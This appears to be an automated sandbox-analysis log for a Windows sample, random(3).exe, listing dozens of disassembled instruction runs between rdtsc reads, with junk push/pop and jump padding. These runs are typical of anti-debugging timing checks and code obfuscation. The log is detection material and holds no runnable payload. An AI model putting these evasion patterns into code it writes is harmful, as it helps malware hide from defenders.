      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F339 second address: A1F33F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F33F second address: A1F349 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F998484EB0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F349 second address: A1F3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F9984B08D0Fh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F9984B08D08h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D248Dh], ebx 0x0000002d push 00000000h 0x0000002f or dword ptr [ebp+12450314h], ecx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007F9984B08D08h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 add dword ptr [ebp+122D1E64h], ecx 0x00000057 mov dword ptr [ebp+122DB82Fh], ebx 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F9984B08D0Bh 0x00000065 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F3C4 second address: A1F3EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F998484EB0Fh 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F3EF second address: A1F3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F572 second address: A1F577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A214A3 second address: A214A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A214A8 second address: A214AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A214AE second address: A21505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F9984B08D08h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 or dword ptr [ebp+1244FB54h], eax 0x0000002a mov dword ptr [ebp+122D1E58h], ecx 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+12462344h], esi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jmp 00007F9984B08D12h 0x00000041 jp 00007F9984B08D06h 0x00000047 popad 0x00000048 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A21505 second address: A2150F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F998484EB06h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2067A second address: A20693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9984B08D15h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A22443 second address: A22449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A22449 second address: A2244D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2244D second address: A22451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A22451 second address: A224A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F9984B08D08h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 jp 00007F9984B08D0Eh 0x0000002d jnc 00007F9984B08D0Ch 0x00000033 push 00000000h 0x00000035 mov bx, dx 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A224A8 second address: A224AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A224AD second address: A224CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F9984B08D06h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A24D03 second address: A24D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A24D07 second address: A24D87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F9984B08D0Fh 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub bx, C267h 0x00000016 push 00000000h 0x00000018 sub dword ptr [ebp+1245522Ah], ecx 0x0000001e push 00000000h 0x00000020 call 00007F9984B08D18h 0x00000025 add edi, dword ptr [ebp+122D2C40h] 0x0000002b pop edi 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e jmp 00007F9984B08D13h 0x00000033 pushad 0x00000034 jp 00007F9984B08D06h 0x0000003a jmp 00007F9984B08D0Ch 0x0000003f popad 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F9984B08D0Ah 0x00000049 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A24D87 second address: A24D97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F998484EB0Ch 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A25CAC second address: A25CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A25CB0 second address: A25CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F998484EB06h 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A25CC6 second address: A25D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jg 00007F9984B08D09h 0x00000014 popad 0x00000015 push 00000000h 0x00000017 mov ebx, dword ptr [ebp+122D2B48h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F9984B08D08h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 mov edi, dword ptr [ebp+122D25CAh] 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push edx 0x00000043 push edx 0x00000044 pop edx 0x00000045 pop edx 0x00000046 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A24F9F second address: A24FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007F998484EB10h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A26D43 second address: A26D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9984B08D0Ch 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A26D5A second address: A26D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A26D5E second address: A26D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2E9F4 second address: A2E9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2E9FE second address: A2EA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D0Dh 0x00000009 pop edx 0x0000000a jng 00007F9984B08D0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2EA18 second address: A2EA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB17h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F998484EB0Eh 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2EA46 second address: A2EA56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2EA56 second address: A2EA68 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F998484EB0Ch 0x00000008 jc 00007F998484EB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2EA68 second address: A2EA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A30043 second address: A3006A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F998484EB06h 0x00000008 jbe 00007F998484EB06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jl 00007F998484EB06h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d pushad 0x0000001e jno 00007F998484EB06h 0x00000024 push eax 0x00000025 pop eax 0x00000026 popad 0x00000027 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A33E46 second address: A33E55 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9984B08D06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A34105 second address: A34109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A34109 second address: A34118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F9984B08D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A34118 second address: A34120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A34120 second address: A3413A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jns 00007F9984B08D06h 0x0000000e jnc 00007F9984B08D06h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38900 second address: A38926 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b jl 00007F998484EB0Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38926 second address: A38935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38935 second address: A3893B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38B40 second address: A38B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F9984B08D0Ch 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38B59 second address: A38B87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F998484EB10h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A38B87 second address: A38BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D0Ch 0x00000009 popad 0x0000000a pop esi 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F9984B08D08h 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3D678 second address: A3D68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 ja 00007F998484EB12h 0x0000000d jnl 00007F998484EB06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3D68D second address: A3D691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DD6D second address: A3DD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DD75 second address: A3DD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9984B08D0Eh 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DD8A second address: A3DDA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB16h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DDA6 second address: A3DDCD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9984B08D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F9984B08D16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DDCD second address: A3DDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB14h 0x00000009 popad 0x0000000a jmp 00007F998484EB10h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DF5D second address: A3DF61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DF61 second address: A3DF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F998484EB10h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A3DF79 second address: A3DF97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F9984B08D0Dh 0x0000000e je 00007F9984B08D06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A74B4F second address: A74B75 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F998484EB06h 0x00000008 jmp 00007F998484EB19h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A74B75 second address: A74B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A75404 second address: A75448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F998484EB15h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnp 00007F998484EB06h 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F998484EB15h 0x0000001c jg 00007F998484EB0Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A75448 second address: A75453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A79FBB second address: A79FCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F998484EB06h 0x00000009 jnp 00007F998484EB06h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D222 second address: A7D228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D228 second address: A7D22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D3C7 second address: A7D3E3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9984B08D06h 0x00000008 jmp 00007F9984B08D0Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D3E3 second address: A7D3E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D3E7 second address: A7D40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9984B08D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push ebx 0x0000000e jmp 00007F9984B08D17h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D40F second address: A7D415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D415 second address: A7D41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D56E second address: A7D58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jmp 00007F998484EB19h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D58E second address: A7D5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9984B08D19h 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D5AD second address: A7D5C4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F998484EB06h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D883 second address: A7D889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D889 second address: A7D88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D88D second address: A7D896 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7DB7C second address: A7DB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7DB84 second address: A7DB88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7DCCE second address: A7DD02 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push esi 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jp 00007F998484EB1Bh 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7DD02 second address: A7DD25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D19h 0x00000007 jns 00007F9984B08D25h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D0348 second address: 9D0356 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D0356 second address: 9D035A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A89A7F second address: A89A89 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F998484EB06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A89A89 second address: A89A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A89A8F second address: A89A9C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F998484EB08h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A89A9C second address: A89AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D12h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A87B17 second address: A87B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
